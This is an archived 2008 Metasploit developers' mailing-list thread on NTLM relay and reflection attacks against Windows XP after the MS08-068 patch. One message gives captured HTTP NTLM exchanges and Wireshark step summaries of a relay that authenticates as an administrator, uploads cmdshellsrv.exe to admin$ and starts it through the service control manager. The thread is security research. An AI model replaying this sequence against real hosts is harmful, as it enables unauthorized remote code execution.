Re: [framework-hackers] smbrelay
On Monday 22 December 2008, ArcSighter Elite wrote: > No, I haven't tested that in such a way. In fact I should check > metasploit's diffs more often instead of updating :D http://grutz.jingojango.net/exploits/pokehashball.html Not currently integrated, but will be eventually. In your python code, which type of NTLM authentication are you using? Standard NTLMv2 lanman/ntlm, or the fancier NTLMSSP with all over the encoded fields? I was wondering whether that made a difference and have not had a chance to write/test it yet. -HD ___ Framework-Hackers mailing list Framework-Hackers@spool.metasploit.com http://spool.metasploit.com/mailman/listinfo/framework-hackers
Re: [framework-hackers] smbrelay
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 H D Moore wrote: > Ah, did you test Metasploit's HTTP-to-SMB attack? More than likely the > same method works (Grutz did some work on that), we just need to implement > the HTTP server side (or merge Grutz's patches in). > > -HD > > > On Monday 22 December 2008, ArcSighter Elite wrote: >> I don't know yet what the truly difference is in here. But the fact is >> what I've posted successfully works against XP SP(2|3) Spanish. We of >> course need more testing, but I already known some people qualify what >> smb_relay does as SMB to SMB attack; and what I'm doing here is some >> sort of HTTP to SMB attack; in where the NTLM negotation is requested >> by the (fake) web server with 401 + WWW-Authenticate: NTLM. Then the >> client sends me his authorization field in the NTLM-Authorization >> field. It's a little of browser based. Of course after that, we got SMB >> traffic but who cares? > > > ___ > Framework-Hackers mailing list > Framework-Hackers@spool.metasploit.com > http://spool.metasploit.com/mailman/listinfo/framework-hackers > No, I haven't tested that in such a way. In fact I should check metasploit's diffs more often instead of updating :D I already told you. Metasploit's tests only performed in the SMB-SMB attack. You have to use UNC or network browsing; Also, the metasploit module is using 139. I'm a bit loss in here. Such a thing exists? I'll do some more tests to get some more basis in the meantime, but I think you agree the results are worth the pain. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFJUAPJH+KgkfcIQ8cRAtSfAKCsnd/s/YczTrTl//Gcj3AlSPUCDACgvhVD 4rA2TElt/kzdqwdAqG/RsDs= =A+jy -END PGP SIGNATURE- ___ Framework-Hackers mailing list Framework-Hackers@spool.metasploit.com http://spool.metasploit.com/mailman/listinfo/framework-hackers
Re: [framework-hackers] smbrelay
Ah, did you test Metasploit's HTTP-to-SMB attack? More than likely the same method works (Grutz did some work on that), we just need to implement the HTTP server side (or merge Grutz's patches in). -HD On Monday 22 December 2008, ArcSighter Elite wrote: > I don't know yet what the truly difference is in here. But the fact is > what I've posted successfully works against XP SP(2|3) Spanish. We of > course need more testing, but I already known some people qualify what > smb_relay does as SMB to SMB attack; and what I'm doing here is some > sort of HTTP to SMB attack; in where the NTLM negotation is requested > by the (fake) web server with 401 + WWW-Authenticate: NTLM. Then the > client sends me his authorization field in the NTLM-Authorization > field. It's a little of browser based. Of course after that, we got SMB > traffic but who cares? ___ Framework-Hackers mailing list Framework-Hackers@spool.metasploit.com http://spool.metasploit.com/mailman/listinfo/framework-hackers
Re: [framework-hackers] smbrelay
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 H D Moore wrote: > On Monday 22 December 2008, ArcSighter Elite wrote: >> Excuse me for the one-person chat in here. >> But let me say that smb_relay of metasploit effectively fails after the >> patch. We already know that, the curious thing is my python script >> doesn't. > > What is the difference? NTLMSSP instead of NTLMv2? > > -HD > > ___ > Framework-Hackers mailing list > Framework-Hackers@spool.metasploit.com > http://spool.metasploit.com/mailman/listinfo/framework-hackers > I don't know yet what the truly difference is in here. But the fact is what I've posted successfully works against XP SP(2|3) Spanish. We of course need more testing, but I already known some people qualify what smb_relay does as SMB to SMB attack; and what I'm doing here is some sort of HTTP to SMB attack; in where the NTLM negotation is requested by the (fake) web server with 401 + WWW-Authenticate: NTLM. Then the client sends me his authorization field in the NTLM-Authorization field. It's a little of browser based. Of course after that, we got SMB traffic but who cares? -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFJT/tPH+KgkfcIQ8cRAg7zAKDfFdim60dM34k+gDyxjzRT3G41AwCfVsm1 rRfaYBZ6BzOW8ahSg6TGmgk= =CsHi -END PGP SIGNATURE- ___ Framework-Hackers mailing list Framework-Hackers@spool.metasploit.com http://spool.metasploit.com/mailman/listinfo/framework-hackers
Re: [framework-hackers] smbrelay
On Monday 22 December 2008, ArcSighter Elite wrote: > Excuse me for the one-person chat in here. > But let me say that smb_relay of metasploit effectively fails after the > patch. We already know that, the curious thing is my python script > doesn't. What is the difference? NTLMSSP instead of NTLMv2? -HD ___ Framework-Hackers mailing list Framework-Hackers@spool.metasploit.com http://spool.metasploit.com/mailman/listinfo/framework-hackers
Re: [framework-hackers] smbrelay
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ArcSighter Elite wrote: > ArcSighter Elite wrote: >> ArcSighter Elite wrote: >>> H D Moore wrote: On Monday 22 December 2008, ArcSighter Elite wrote: > I came this morning with something. The MS08-67 patch when challenge > keys couldn't be replayed, affects also the other variants of the > attack, such as http 401 + WWW-Authenticate: NTLM, and the IMAP, POP > and SMTP versions? Supposedly it affects any component that initializes the security negotiation the "right" way, but only during a direct reflection attack. You can still relay to a third-party host regardless of protocol. -HD > > ___ Framework-Hackers mailing list Framework-Hackers@spool.metasploit.com http://spool.metasploit.com/mailman/listinfo/framework-hackers >>> Well, this is how we go. >>> Before MS08-067: >>> Windows XP SP2 Spanish: >>> I totally owned. HTTP-based. No user intervention. No nothing. KIS2009 >>> doesn't block (find-socket). >>> I totally owned SMB-SMB attack, UNC share. >>> After MS08-067: >>> I owned too! But this time I got a prompt asking for username and >>> password; I mean, It doesn't automatically authenticate. >>> The SMB-SMB attack doesn't spawn my shell. > >>> Tell me what you think to proceed to XP SP3; although I think I will get >>> the same results. > >> Sorry about the typo, Is MS08-068 what I've applied not MS08-067-netapi. >> It's the right patch, and the results are above. > > Well, it surprisingly seems to work also in XP-Sp3 before and after the > patch too, the interesting prompt about username/password authentication > was my bad; i don' get prompt neither XP-SP3 nor XP-SP2; after I > rebooted SP2. > > > Here is what I've done (some hack in Python) > > 1. Force browser to authenticate HTTP 401 + WWW-Authenticate: NTLM > > Ex.: > (Here *.*.*.1 is server, *.*.*.2 client) > > GET / HTTP/1.1 > Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, > application/x-shockwave-flash, application/vnd.ms-excel, > application/vnd.ms-powerpoint, application/msword, */* > Accept-Language: es > Accept-Encoding: gzip, deflate > User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; > Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ) > Host: *.*.*.1 > Connection: Keep-Alive > > HTTP/1.1 401 Unauthorized > Content-Length: 0 > Content-Type: text/html > Server: Microsoft-IIS/6.0 > WWW-Authenticate: NTLM > Connection: keep-alive > > GET / HTTP/1.1 > Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, > application/x-shockwave-flash, application/vnd.ms-excel, > application/vnd.ms-powerpoint, application/msword, */* > Accept-Language: es > Accept-Encoding: gzip, deflate > User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; > Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ) > Host: *.*.*.1 > Connection: Keep-Alive > Authorization: NTLM TlRAAB4IIogAFASgKDw== > > //-- Avoid null sesions > > HTTP/1.1 401 Access Denied > Server: Microsoft-IIS/6.0 > WWW-Authenticate: NTLM > TlRABgAGADgHsgAA+vnrqY91YSEAACwALAA+BQEoCg9XAFMAMgACAAYAVwBTADIAAQAGAFcAUwAyAAQABgB3AHMAMgADAAYAdwBzADIAAA== > > Content-Length: 0 > Content-Type: text/html > > GET / HTTP/1.1 > Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, > application/x-shockwave-flash, application/vnd.ms-excel, > application/vnd.ms-powerpoint, application/msword, */* > Accept-Language: es > Accept-Encoding: gzip, deflate > User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; > Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ) > Host: *.*.*.1 > Connection: Keep-Alive > Authorization: NTLM > TlRGAAYAHwYABgAlBQAFABIGgAaAFwGAAYAdgCsBYIAAgUBKAoPMQAwAC4AMQA1AC4AMwAuADgANgBBAGQAbQBpAG4AaQBzAHQAcgBhAGQAbwByAFcAUwAyADl4VTbp6F8qOXhVNunoXyo5eFU26ehfKrY5HrAdIbqrX4QPLLSy0y8RPgbMsVX5gg== > > > HTTP/1.1 200 OK > Content-Length: 92 > Connection: close > > 2. The basic replay attack (wireshark summaries only): > > //- Negotiating > 513 10.025748 *.*.*.1 *.*.*.2 > SMB Negotiate Protocol Request > > 516 10.026712 *.*.*.1 *.*.*.2 SMB Session Setup AndX Request, > NTLMSSP_NEGOTIATE > > /-- Authenticating > 520 10.029566 *.*.*.1 *.*.*.2 SMB Session Setup AndX Request, > NTLMSSP_AUTH, User: WS2\Administrador > > /-- Accessing IPC$ > 523 10.034183 *.*.*.1 *.*.*.2 SMB Tree Connect AndX Request, Path: > \\*.*.*.2\IPC$ > > /--Accesing admin$ > 531 10.040157 *.*.*.1 *.*.*.2 SMB Tree Connect AndX Request, Path: > \\*.*.*.2\admin$ > > /--Uploading exefile > 533 10.041749 *.*.*.1 *.*.*.2 SMB NT Create AndX Request, Path: > \cmdshellsrv.exe > > /--Accessing service control manager. > 561 1
Re: [framework-hackers] smbrelay
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ArcSighter Elite wrote: > ArcSighter Elite wrote: >> H D Moore wrote: >>> On Monday 22 December 2008, ArcSighter Elite wrote: I came this morning with something. The MS08-67 patch when challenge keys couldn't be replayed, affects also the other variants of the attack, such as http 401 + WWW-Authenticate: NTLM, and the IMAP, POP and SMTP versions? >>> Supposedly it affects any component that initializes the security >>> negotiation the "right" way, but only during a direct reflection attack. >>> You can still relay to a third-party host regardless of protocol. >>> -HD > > > >>> >>> ___ >>> Framework-Hackers mailing list >>> Framework-Hackers@spool.metasploit.com >>> http://spool.metasploit.com/mailman/listinfo/framework-hackers >> Well, this is how we go. > >> Before MS08-067: > >> Windows XP SP2 Spanish: >> I totally owned. HTTP-based. No user intervention. No nothing. KIS2009 >> doesn't block (find-socket). >> I totally owned SMB-SMB attack, UNC share. > >> After MS08-067: >> I owned too! But this time I got a prompt asking for username and >> password; I mean, It doesn't automatically authenticate. >> The SMB-SMB attack doesn't spawn my shell. > > >> Tell me what you think to proceed to XP SP3; although I think I will get >> the same results. > > > Sorry about the typo, Is MS08-068 what I've applied not MS08-067-netapi. > It's the right patch, and the results are above. Well, it surprisingly seems to work also in XP-Sp3 before and after the patch too, the interesting prompt about username/password authentication was my bad; i don' get prompt neither XP-SP3 nor XP-SP2; after I rebooted SP2. Here is what I've done (some hack in Python) 1. Force browser to authenticate HTTP 401 + WWW-Authenticate: NTLM Ex.: (Here *.*.*.1 is server, *.*.*.2 client) GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Accept-Language: es Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ) Host: *.*.*.1 Connection: Keep-Alive HTTP/1.1 401 Unauthorized Content-Length: 0 Content-Type: text/html Server: Microsoft-IIS/6.0 WWW-Authenticate: NTLM Connection: keep-alive GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Accept-Language: es Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ) Host: *.*.*.1 Connection: Keep-Alive Authorization: NTLM TlRAAB4IIogAFASgKDw== //-- Avoid null sesions HTTP/1.1 401 Access Denied Server: Microsoft-IIS/6.0 WWW-Authenticate: NTLM TlRABgAGADgHsgAA+vnrqY91YSEAACwALAA+BQEoCg9XAFMAMgACAAYAVwBTADIAAQAGAFcAUwAyAAQABgB3AHMAMgADAAYAdwBzADIAAA== Content-Length: 0 Content-Type: text/html GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Accept-Language: es Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ) Host: *.*.*.1 Connection: Keep-Alive Authorization: NTLM TlRGAAYAHwYABgAlBQAFABIGgAaAFwGAAYAdgCsBYIAAgUBKAoPMQAwAC4AMQA1AC4AMwAuADgANgBBAGQAbQBpAG4AaQBzAHQAcgBhAGQAbwByAFcAUwAyADl4VTbp6F8qOXhVNunoXyo5eFU26ehfKrY5HrAdIbqrX4QPLLSy0y8RPgbMsVX5gg== HTTP/1.1 200 OK Content-Length: 92 Connection: close 2. The basic replay attack (wireshark summaries only): //- Negotiating 513 10.025748 *.*.*.1 *.*.*.2 SMB Negotiate Protocol Request 516 10.026712 *.*.*.1 *.*.*.2 SMB Session Setup AndX Request, NTLMSSP_NEGOTIATE /-- Authenticating 520 10.029566 *.*.*.1 *.*.*.2 SMB Session Setup AndX Request, NTLMSSP_AUTH, User: WS2\Administrador /-- Accessing IPC$ 523 10.034183 *.*.*.1 *.*.*.2 SMB Tree Connect AndX Request, Path: \\*.*.*.2\IPC$ /--Accesing admin$ 531 10.040157 *.*.*.1 *.*.*.2 SMB Tree Connect AndX Request, Path: \\*.*.*.2\admin$ /--Uploading exefile 533 10.041749 *.*.*.1 *.*.*.2 SMB NT Create AndX Request, Path: \cmdshellsrv.exe /--Accessing service control manager. 561 11.066248 *.*.*.1 *.*.*.2 SMB NT Create AndX Request, FID: 0x4000, Path: \svcctl /-- well I got tired. The rest you already know: binding, OpenSCManager, OpenService, StartService => owning! So please give an
Re: [framework-hackers] smbrelay
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ArcSighter Elite wrote: > H D Moore wrote: >> On Monday 22 December 2008, ArcSighter Elite wrote: >>> I came this morning with something. The MS08-67 patch when challenge >>> keys couldn't be replayed, affects also the other variants of the >>> attack, such as http 401 + WWW-Authenticate: NTLM, and the IMAP, POP >>> and SMTP versions? >> Supposedly it affects any component that initializes the security >> negotiation the "right" way, but only during a direct reflection attack. >> You can still relay to a third-party host regardless of protocol. > >> -HD > > > > >> > >> ___ >> Framework-Hackers mailing list >> Framework-Hackers@spool.metasploit.com >> http://spool.metasploit.com/mailman/listinfo/framework-hackers > > Well, this is how we go. > > Before MS08-067: > > Windows XP SP2 Spanish: > I totally owned. HTTP-based. No user intervention. No nothing. KIS2009 > doesn't block (find-socket). > I totally owned SMB-SMB attack, UNC share. > > After MS08-067: > I owned too! But this time I got a prompt asking for username and > password; I mean, It doesn't automatically authenticate. > The SMB-SMB attack doesn't spawn my shell. > > > Tell me what you think to proceed to XP SP3; although I think I will get > the same results. > Sorry about the typo, Is MS08-068 what I've applied not MS08-067-netapi. It's the right patch, and the results are above. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFJT8T/H+KgkfcIQ8cRAkdXAKCJZtd2tWPUBKNgvAgkHfnrGyoKLwCguW+Z tPwt/E4acEZq/ukdFo7VZq0= =LQos -END PGP SIGNATURE- ___ Framework-Hackers mailing list Framework-Hackers@spool.metasploit.com http://spool.metasploit.com/mailman/listinfo/framework-hackers
Re: [framework-hackers] smbrelay
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 H D Moore wrote: > On Monday 22 December 2008, ArcSighter Elite wrote: >> I came this morning with something. The MS08-67 patch when challenge >> keys couldn't be replayed, affects also the other variants of the >> attack, such as http 401 + WWW-Authenticate: NTLM, and the IMAP, POP >> and SMTP versions? > > Supposedly it affects any component that initializes the security > negotiation the "right" way, but only during a direct reflection attack. > You can still relay to a third-party host regardless of protocol. > > -HD > > > > > > > ___ > Framework-Hackers mailing list > Framework-Hackers@spool.metasploit.com > http://spool.metasploit.com/mailman/listinfo/framework-hackers Well, this is how we go. Before MS08-067: Windows XP SP2 Spanish: I totally owned. HTTP-based. No user intervention. No nothing. KIS2009 doesn't block (find-socket). I totally owned SMB-SMB attack, UNC share. After MS08-067: I owned too! But this time I got a prompt asking for username and password; I mean, It doesn't automatically authenticate. The SMB-SMB attack doesn't spawn my shell. Tell me what you think to proceed to XP SP3; although I think I will get the same results. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFJT8LKH+KgkfcIQ8cRAjn0AJ9t5oqvvvhE9G2zFbjM0rsE+b0epACfbKAa edWBCnvZbTiWXzbwT1SRLSs= =g+P0 -END PGP SIGNATURE- ___ Framework-Hackers mailing list Framework-Hackers@spool.metasploit.com http://spool.metasploit.com/mailman/listinfo/framework-hackers
Re: [framework-hackers] smbrelay
On Monday 22 December 2008, ArcSighter Elite wrote: > Yes, I know the replay attack it's still working. I'm talking about the > reflection one in here. Microsoft fixed a bug in the Windows Media Player this month where reflection still worked. It sounds like this was the exception because of how the security descriptor was initialized, if other apps have the same issue, I bet Microsoft would patch them as well. > I'm going to do some tests right away. Wait for results. Looking forward to it, -HD ___ Framework-Hackers mailing list Framework-Hackers@spool.metasploit.com http://spool.metasploit.com/mailman/listinfo/framework-hackers
Re: [framework-hackers] smbrelay
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 H D Moore wrote: > On Monday 22 December 2008, ArcSighter Elite wrote: >> I came this morning with something. The MS08-67 patch when challenge >> keys couldn't be replayed, affects also the other variants of the >> attack, such as http 401 + WWW-Authenticate: NTLM, and the IMAP, POP >> and SMTP versions? > > Supposedly it affects any component that initializes the security > negotiation the "right" way, but only during a direct reflection attack. > You can still relay to a third-party host regardless of protocol. > > -HD > > > > > > > ___ > Framework-Hackers mailing list > Framework-Hackers@spool.metasploit.com > http://spool.metasploit.com/mailman/listinfo/framework-hackers Yes, I know the replay attack it's still working. I'm talking about the reflection one in here. I'm going to do some tests right away. Wait for results. Sincrely. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFJT746H+KgkfcIQ8cRAiFHAKDlnVWEYiwYEQDy1irZp3jbL5hmrQCdFxsx v0eBn8RIBMDxN2MnOVSof9M= =WkQy -END PGP SIGNATURE- ___ Framework-Hackers mailing list Framework-Hackers@spool.metasploit.com http://spool.metasploit.com/mailman/listinfo/framework-hackers
Re: [framework-hackers] smbrelay
On Monday 22 December 2008, ArcSighter Elite wrote: > I came this morning with something. The MS08-67 patch when challenge > keys couldn't be replayed, affects also the other variants of the > attack, such as http 401 + WWW-Authenticate: NTLM, and the IMAP, POP > and SMTP versions? Supposedly it affects any component that initializes the security negotiation the "right" way, but only during a direct reflection attack. You can still relay to a third-party host regardless of protocol. -HD ___ Framework-Hackers mailing list Framework-Hackers@spool.metasploit.com http://spool.metasploit.com/mailman/listinfo/framework-hackers
[framework-hackers] smbrelay
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi guys. I came this morning with something. The MS08-67 patch when challenge keys couldn't be replayed, affects also the other variants of the attack, such as http 401 + WWW-Authenticate: NTLM, and the IMAP, POP and SMTP versions? Sincerely. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFJT7WKH+KgkfcIQ8cRAqHcAKCYOQnpzkXLD8tULjNwUONl2Z638ACdGl+r /xx7xLJytzVgHZtk0mB2oo0= =b56X -END PGP SIGNATURE- ___ Framework-Hackers mailing list Framework-Hackers@spool.metasploit.com http://spool.metasploit.com/mailman/listinfo/framework-hackers
